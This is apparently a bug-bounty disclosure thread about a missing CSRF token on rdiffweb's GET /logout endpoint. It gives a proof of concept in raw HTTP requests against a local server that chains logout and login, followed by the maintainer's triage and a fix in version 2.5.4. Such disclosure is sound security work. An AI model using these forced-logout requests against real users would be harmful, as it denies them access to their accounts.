Lack of CSRF Token in Logout in ikus060/rdiffweb

Valid

Reported on

Dec 5th 2022


Description

we haven't csrf token in logout basically this is not really issue but in rdiffweb we have logically redirect user to last source like logout method. in this case attacker can chain two request(logout,login) that lead to dos

Proof of Concept

  1. send get logout request and get session_id
GET /logout HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: session_id=475774603a53b2967f21e2be80de38d1e37babce
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
  1. send login request with previous session_id in response
POST /login/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/login/
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://127.0.0.1:8080
Connection: close
Cookie: session_id=0fc203ce03dac2a8cc4dafc1852b920643aa8e85
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

login=admin&password=admin123&submit=Sign+in

response like that

HTTP/1.1 303 See Other
Content-Type: text/html;charset=utf-8
Server: CherryPy/18.8.0
Date: Mon, 05 Dec 2022 06:40:58 GMT
X-Frame-Options: DENY
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Expires: 0
Referrer-Policy: same-origin
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline'
Location: http://127.0.0.1:8080/
Content-Language: en_US
Vary: Accept-Encoding
Content-Length: 90
Set-Cookie: session_id=4e13178447f685e835b6f9c78fdd203b32f8048a; HttpOnly; Path=/; SameSite=Lax
Connection: close

This resource can be found at <a href="http://127.0.0.1:8080/">http://127.0.0.1:8080/</a>.
  1. login and logout unlimit

Impact

User never logged to rdiffweb

We are processing your report and will contact the ikus060/rdiffweb team within 24 hours. a month ago
reza.duty
a month ago

Researcher


Prevention

Rate limiting: This involves limiting the number of requests that a user can make to your web application within a given time period. This can help to prevent DoS attacks by limiting the amount of traffic that an attacker can generate.

Captcha verification: This involves using a challenge-response test to verify that a user is a human and not a bot. This can help to prevent DoS attacks by blocking automated requests from bots.

Blacklisting: This involves maintaining a list of known attackers and blocking their requests. This can help to prevent DoS attacks by blocking requests from known attackers before they reach your web application.

We have contacted a member of the ikus060/rdiffweb team and are waiting to hear back a month ago
Patrik Dufresne
a month ago

Maintainer


Rate limiting is already in place.

Cross Site Request Forgery are in place and validate the origin on any POST request as recommended by OWASP

Blacklisting: As highlight in the documentation, for any serious installation of Rdiffweb it is expected to be behind a reverse proxy and possibly behind a WAF. Re-implementation of this technique to mitigate DoS is out of scope for Rdiffweb and any other Web application.

reza.duty
a month ago

Researcher


Hello,

Sure but in this case, we do have not any rate limit on the logout workflow but the attacker can redirect the user to logout then the user to login but logout automatically.

Regard

Patrik Dufresne modified the CWE from Uncontrolled Resource Consumption to Cross-Site Request Forgery (CSRF) a month ago
Patrik Dufresne
a month ago

Maintainer


After verification, it seams a GET /logout is allowed. While I tought only POST /logout was accepted.

Will work on a fix.

The researcher has received a minor penalty to their credibility for misclassifying the vulnerability type: -1
Patrik Dufresne validated this vulnerability a month ago
reza.duty has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
reza.duty
a month ago

Researcher


can you please request for cve

Patrik Dufresne marked this as fixed in 2.5.4 with commit e6f0d8 21 days ago
Patrik Dufresne has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Dec 26th 2022
Patrik Dufresne
19 days ago

Maintainer


@admin I cannot publish this vulnerability. It's failing with an error. Could you do it for me ?

Pavlos
19 days ago

Admin


Of course sorry about that, we're fixing it

Ben Harvie published this vulnerability 19 days ago
Ben Harvie
19 days ago

Admin


This bug has now been fixed, I have gone ahead and published the vulnerability on your behalf, apologies for the inconvenience!

reza.duty
15 days ago

Researcher


Thanks, everyone can you please request cve

to join this conversation